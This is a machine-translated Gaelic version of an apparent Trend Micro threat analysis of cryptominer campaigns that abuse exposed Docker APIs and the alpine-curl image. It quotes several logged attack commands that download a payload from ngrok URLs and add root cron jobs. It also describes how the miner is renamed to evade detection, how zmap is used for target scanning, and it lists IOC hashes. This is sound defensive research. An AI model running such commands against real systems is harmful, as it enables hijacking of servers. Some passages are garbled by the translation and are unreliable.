Rinn sinn mion-sgrùdadh air an dàta a chaidh a chruinneachadh le bhith a’ cleachdadh soithichean meala, a chruthaich sinn gus sùil a chumail air bagairtean. Agus lorg sinn gnìomhachd cudromach bho mhèinnearan cryptocurrency gun iarraidh no gun chead air an cleachdadh mar shoithichean meallta a’ cleachdadh ìomhaigh foillsichte leis a’ choimhearsnachd air Docker Hub. Tha an ìomhaigh air a chleachdadh mar phàirt de sheirbheis a 'lìbhrigeadh mèinnearan cryptocurrency droch-rùnach.
A bharrachd air an sin, tha prògraman airson a bhith ag obair le lìonraidhean air an cur a-steach gus a dhol a-steach do shoithichean is thagraidhean faisg air làimh.
Bidh sinn a’ fàgail na poitean meala againn mar a tha, is e sin, le roghainnean bunaiteach, às aonais ceumannan tèarainteachd no stàladh bathar-bog a bharrachd às deidh sin. Thoir an aire gu bheil molaidhean aig Docker airson stèidheachadh tùsail gus mearachdan agus so-leòntachd sìmplidh a sheachnadh. Ach is e soithichean a th’ anns na poitean meala a thathas a’ cleachdadh gus ionnsaighean a lorg a tha ag amas air an àrd-ùrlar containerization, chan e na tagraidhean taobh a-staigh na soithichean.
Tha an gnìomhachd droch-rùnach a chaidh a lorg cuideachd sònraichte leis nach eil feum air so-leòntachd agus tha e cuideachd neo-eisimeileach bhon dreach Docker. Is e a bhith a’ lorg ìomhaigh container a tha air a rèiteachadh gu ceàrr, agus mar sin fosgailte, a h-uile rud a dh’ fheumas luchd-ionnsaigh gus mòran de luchd-frithealaidh fosgailte a ghlacadh.
Leigidh an API Docker nach deach a dhùnadh leis an neach-cleachdaidh raon farsaing de , a’ toirt a-steach a bhith a’ faighinn liosta de shoithichean ruith, a’ faighinn logaichean bho shoitheach sònraichte, a’ tòiseachadh, a’ stad (a’ gabhail a-steach èignichte) agus eadhon a’ cruthachadh soitheach ùr bho ìomhaigh shònraichte le suidheachaidhean sònraichte.
Air an taobh chlì tha an dòigh lìbhrigidh malware. Air an làimh dheis tha àrainneachd an neach-ionnsaigh, a leigeas le ìomhaighean a chuir a-mach aig astar.
Sgaoileadh a rèir dùthaich de 3762 fosgailte Docker APIs. Stèidhichte air sgrùdadh Shodan leis an deit 12.02.2019/XNUMX/XNUMX
Slabhraidh ionnsaigh agus roghainnean pàighidh pàighidh
Chaidh gnìomhachd droch-rùnach a lorg chan ann a-mhàin le cuideachadh bho phoitean meala. Tha dàta bho Shodan a’ sealltainn gu bheil an àireamh de APIan Docker fosgailte (faic an dàrna graf) air a dhol suas bho rinn sinn sgrùdadh air inneal mì-chruthaichte a chaidh a chleachdadh mar dhrochaid gus bathar-bog mèinnearachd cryptocurrency Monero a chleachdadh. Anns an Dàmhair an-uiridh (2018, dàta làithreach mu thuairmeas. eadar-theangair) cha robh ann ach 856 API fosgailte.
Sheall sgrùdadh air na logaichean meala gu robh cleachdadh ìomhaighean soithich cuideachd co-cheangailte ri cleachdadh , inneal airson ceanglaichean tèarainte a stèidheachadh no trafaic a chuir air adhart bho phuingean a tha ruigsinneach don phoball gu seòlaidhean no goireasan sònraichte (mar eisimpleir localhost). Leigidh seo le luchd-ionnsaigh URLan a chruthachadh gu dinamach nuair a bhios iad a’ lìbhrigeadh uallach pàighidh gu frithealaiche fosgailte. Gu h-ìosal tha eisimpleirean còd bho na logaichean a’ sealltainn droch dhìol air seirbheis ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Mar a chì thu, tha na faidhlichean a chaidh a luchdachadh sìos air an luchdachadh sìos bho URLan a tha ag atharrachadh gu cunbhalach. Tha ceann-latha crìochnachaidh goirid aig na URLan sin, agus mar sin chan urrainnear luchdan pàighidh a luchdachadh sìos às deidh a’ cheann-latha crìochnachaidh.
Tha dà roghainn pàighidh pàighidh ann. Is e a 'chiad fhear mèinneadair ELF a chuir ri chèile airson Linux (air a mhìneachadh mar Coinminer.SH.MALXMR.ATNO) a tha a' ceangal ris an amar mèinnearachd. Is e an dàrna fear sgriobt (TrojanSpy.SH.ZNETMAP.A) a chaidh a dhealbhadh gus innealan lìonra sònraichte fhaighinn airson raointean lìonra a sganadh agus an uairsin lorg targaidean ùra.
Tha an sgriobt dropper a 'suidheachadh dà caochladairean, a tha an uair sin a chleachdadh airson a' cleachdadh a 'mhèinnear cryptocurrency. Anns an caochladair HOST tha an URL far a bheil na faidhlichean droch-rùnach suidhichte, agus is e an caochladair RIP an t-ainm faidhle (gu dearbh, an hash) den mhèinnear a thèid a chleachdadh. Bidh an caochladair HOST ag atharrachadh a h-uile uair a bhios an caochladair hash ag atharrachadh. Tha an sgriobt cuideachd a 'feuchainn ri dèanamh cinnteach nach eil mèinnearan cryptocurrency sam bith eile a' ruith air an fhrithealaiche ionnsaigh.
Eisimpleirean de chaochladairean HOST agus RIP, a bharrachd air criomag còd a chaidh a chleachdadh gus dèanamh cinnteach nach eil mèinnearan eile a 'ruith
Mus tòisich thu air a 'mhèinnear, tha e air ath-ainmeachadh gu nginx. Bidh dreachan eile den sgriobt seo ag ath-ainmeachadh a’ mhèinnear gu seirbheisean dligheach eile a dh’ fhaodadh a bhith an làthair ann an àrainneachdan Linux. Mar as trice bidh seo gu leòr gus seicichean a sheachnadh mu choinneamh liosta nam pròiseasan ruith.
Tha feartan aig an sgriobt sgrùdaidh cuideachd. Bidh e ag obair leis an aon sheirbheis URL gus na h-innealan riatanach a chleachdadh. Nam measg tha an binary zmap, a thathas a’ cleachdadh gus lìonraidhean a sganadh agus liosta de phuirt fhosgailte fhaighinn. Bidh an sgriobt cuideachd a’ luchdachadh dàna eile a thathas a’ cleachdadh gus eadar-obrachadh leis na seirbheisean a chaidh a lorg agus brataichean fhaighinn bhuapa gus fiosrachadh a bharrachd a dhearbhadh mun t-seirbheis a chaidh a lorg (mar eisimpleir, an dreach aige).
Bidh an sgriobt cuideachd a’ dearbhadh cuid de raointean lìonra ri sganadh, ach tha seo an urra ri dreach an sgriobt. Bidh e cuideachd a’ suidheachadh na puirt targaid bho na seirbheisean - sa chùis seo, Docker - mus ruith an scan.
Cho luath ‘s a lorgar targaidean, thèid brataichean a thoirt air falbh bhuapa gu fèin-ghluasadach. Bidh an sgriobt cuideachd a’ sìoladh thargaidean a rèir nan seirbheisean, tagraidhean, co-phàirtean no àrd-ùrlaran inntinneach: Redis, Jenkins, Drupal, MODX, , neach-dèiligidh Docker 1.16 agus Apache CouchDB. Ma tha an frithealaiche a chaidh a sganadh a’ maidseadh gin dhiubh, thèid a shàbhaladh ann am faidhle teacsa, a dh’ fhaodas luchd-ionnsaigh a chleachdadh nas fhaide air adhart airson mion-sgrùdadh agus sgrùdadh às deidh sin. Thèid na faidhlichean teacsa seo a luchdachadh suas gu frithealaichean an luchd-ionnsaigh tro cheanglaichean fiùghantach. Is e sin, thèid URL fa leth a chleachdadh airson gach faidhle, a tha a 'ciallachadh gu bheil e doirbh faighinn a-steach às dèidh sin.
Is e ìomhaigh Docker a th’ anns an vectar ionnsaigh, mar a chithear san ath dhà phìos còd.
Aig a 'mhullach tha ath-ainmeachadh gu seirbheis dhligheach, agus aig a' bhonn tha mar a thathar a 'cleachdadh zmap airson lìonraidhean a sganadh
Aig a’ mhullach tha raointean lìonra ro-mhìnichte, aig a’ bhonn tha puirt sònraichte airson seirbheisean a lorg, a’ gabhail a-steach Docker
Tha an dealbh-sgrìn a’ sealltainn gun deach an ìomhaigh alpach-curl a luchdachadh sìos còrr air 10 millean uair
Stèidhichte air Alpine Linux agus curl, inneal CLI a tha èifeachdach a thaobh ghoireasan airson faidhlichean a ghluasad thairis air diofar phròtacalan, faodaidh tu togail . Mar a chì thu san ìomhaigh roimhe, chaidh an ìomhaigh seo a luchdachadh sìos mu thràth còrr air 10 millean uair. Faodaidh àireamh mhòr de luchdachadh a-nuas a bhith a’ ciallachadh a bhith a’ cleachdadh an ìomhaigh seo mar àite inntrigidh; chaidh an ìomhaigh seo ùrachadh o chionn còrr is sia mìosan; cha do luchdaich luchd-cleachdaidh sìos ìomhaighean eile bhon stòr seo cho tric. Anns an Docker - seata de stiùiridhean air an cleachdadh gus soitheach a rèiteachadh airson a ruith. Ma tha roghainnean an àite inntrigidh ceàrr (mar eisimpleir, tha an soitheach air fhàgail fosgailte bhon eadar-lìn), faodar an ìomhaigh a chleachdadh mar vectar ionnsaigh. Faodaidh luchd-ionnsaigh a chleachdadh gus uallach pàighidh a lìbhrigeadh ma lorgas iad inneal mì-dhealbhaichte no fosgailte air fhàgail gun taic.
Tha e cudromach cuimhneachadh nach eil an ìomhaigh seo (alpach-curl) fhèin droch-rùnach, ach mar a chì thu gu h-àrd, faodar a chleachdadh gus gnìomhan droch-rùnach a choileanadh. Faodar ìomhaighean Docker coltach ris a chleachdadh cuideachd airson gnìomhan droch-rùnach a dhèanamh. Chuir sinn fios gu Docker agus dh’ obraich sinn leotha air a’ chùis seo.
molaidhean
fhàgail airson mòran chompanaidhean, gu sònraichte an fheadhainn a tha a’ cur an gnìomh , le fòcas air leasachadh luath agus lìbhrigeadh. Tha a h-uile càil air a dhèanamh nas miosa leis an fheum air cumail ri riaghailtean sgrùdaidh is sgrùdaidh, an fheum air sùil a chumail air dìomhaireachd dàta, a bharrachd air a’ mhilleadh mòr bho neo-ghèilleadh. Le bhith a’ toirt a-steach fèin-ghluasad tèarainteachd a-steach don chuairt-beatha leasachaidh chan e a-mhàin gad chuideachadh gus tuill tèarainteachd a lorg a dh’ fhaodadh a dhol neo-aithnichte air dhòigh eile, ach cuidichidh e thu cuideachd gus eallach obrach neo-riatanach a lughdachadh, leithid ruith bathar-bog a bharrachd airson gach so-leòntachd no mì-dhealbhadh a lorgar às deidh tagradh a chuir a-steach.
Tha an tachartas air a bheilear a’ beachdachadh san artaigil seo a’ soilleireachadh an fheum air sàbhailteachd a ghabhail a-steach bhon toiseach, a’ toirt a-steach na molaidhean a leanas:
- Airson rianadairean siostam agus luchd-leasachaidh: Thoir sùil an-còmhnaidh air na roghainnean API agad gus dèanamh cinnteach gu bheil a h-uile càil air a rèiteachadh gus gabhail ri iarrtasan bho fhrithealaiche sònraichte no lìonra a-staigh a-mhàin.
- Lean am prionnsapal de chòraichean as lugha: dèan cinnteach gu bheil ìomhaighean soidhnidh air an soidhnigeadh agus air an dearbhadh, cuingealaich ruigsinneachd gu pàirtean èiginneach (seirbheis cur air bhog container) agus cuir crioptachadh ri ceanglaichean lìonra.
- Lean agus a’ comasachadh uidheamachdan tèarainteachd, m.e. agus air a thogail a-steach .
- Cleachd sganadh fèin-ghluasadach de amannan ruith agus ìomhaighean gus fiosrachadh a bharrachd fhaighinn mu na pròiseasan a tha a’ ruith anns a’ ghobhar (mar eisimpleir, gus spoofing a lorg no so-leòntachd a lorg). Bidh smachd tagraidh agus sgrùdadh ionracas a’ cuideachadh le bhith a’ lorg atharrachaidhean neo-àbhaisteach air frithealaichean, faidhlichean, agus raointean siostam.
Bidh Trendmicro a’ cuideachadh sgiobaidhean DevOps a bhith a’ togail gu tèarainte, gan sgaoileadh gu sgiobalta, agus a’ cur air bhog an àite sam bith. Trend Micro A’ toirt seachad tèarainteachd chumhachdach, sgiobalta agus fèin-ghluasadach thairis air loidhne-phìoban DevOps na buidhne agus a’ toirt seachad iomadh dìon bho chunnart gus eallach obrach corporra, brìgheil agus sgòthan a dhìon aig àm ruith. Bidh e cuideachd a’ cur tèarainteachd container le и , a bhios a’ sganadh ìomhaighean container Docker airson malware agus so-leòntachd aig àm sam bith san loidhne-phìoban leasachaidh gus casg a chuir air bagairtean mus tèid an cleachdadh.
Comharraidhean co-rèiteachaidh
hashes co-cheangailte:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
air a ' Bidh luchd-labhairt gnìomhach a’ sealltainn dè na suidheachaidhean a dh’ fheumar a dhèanamh an-toiseach gus an coltas a lughdachadh no gus an suidheachadh a tha air a mhìneachadh gu h-àrd a sheachnadh. Agus air 19-21 Lùnastal aig dian air-loidhne Faodaidh tu na duilgheadasan tèarainteachd sin agus an leithid a dheasbad le co-obraichean agus tidsearan gnìomhach aig bòrd cruinn, far am faod a h-uile duine bruidhinn a-mach agus èisteachd ri pianta agus soirbheachas co-obraichean eòlach.
Source: www.habr.com